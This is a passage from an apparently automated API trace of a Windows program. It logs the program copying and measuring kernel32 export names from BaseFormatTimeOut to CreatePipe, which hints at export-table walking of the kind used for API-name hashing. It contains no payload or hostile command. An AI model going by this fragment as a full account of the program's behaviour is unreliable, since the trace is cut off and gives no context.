returned="BaseFormatObjectAttributes" [0083.565] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.565] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.565] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.565] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.565] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.565] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.565] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.565] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.565] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.565] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.565] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.565] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.566] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.566] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.566] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.566] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.566] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.566] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.566] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.566] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.566] lstrlenA (lpString="BEEP") returned 4 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.566] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.566] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.566] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.566] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.566] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.566] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.566] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.566] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.566] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.566] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.567] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.567] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.567] lstrlenA (lpString="CANCELIO") returned 8 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.567] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.567] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.567] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.567] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.567] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.567] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.567] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.567] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.567] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.567] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.567] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.567] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.567] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.567] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.567] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.567] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.568] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.568] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.568] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.568] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.568] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.568] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.568] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.568] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.568] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.568] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.568] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.568] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.568] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.568] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.568] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.568] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.568] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.568] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.568] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.569] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.569] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.569] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.569] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.569] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.569] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.569] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.569] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.569] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.569] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.569] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.569] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.569] lstrlenA (lpString="COPYFILEA") returned 9 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.569] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.569] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.569] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.569] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.569] lstrlenA (lpString="COPYFILEW") returned 9 [0083.569] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.570] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.570] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.570] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.570] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.570] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.570] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.570] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.570] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.570] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.570] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.570] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.570] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.570] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.570] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.570] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.570] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.570] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.570] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.570] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.570] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.571] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.571] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.571] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.571] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.571] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.571] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.571] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.571] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.571] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.571] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.571] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.571] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.571] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.571] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.571] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.571] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.571] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.571] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.571] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.572] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.572] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.572] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.572] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.572] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.572] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.572] 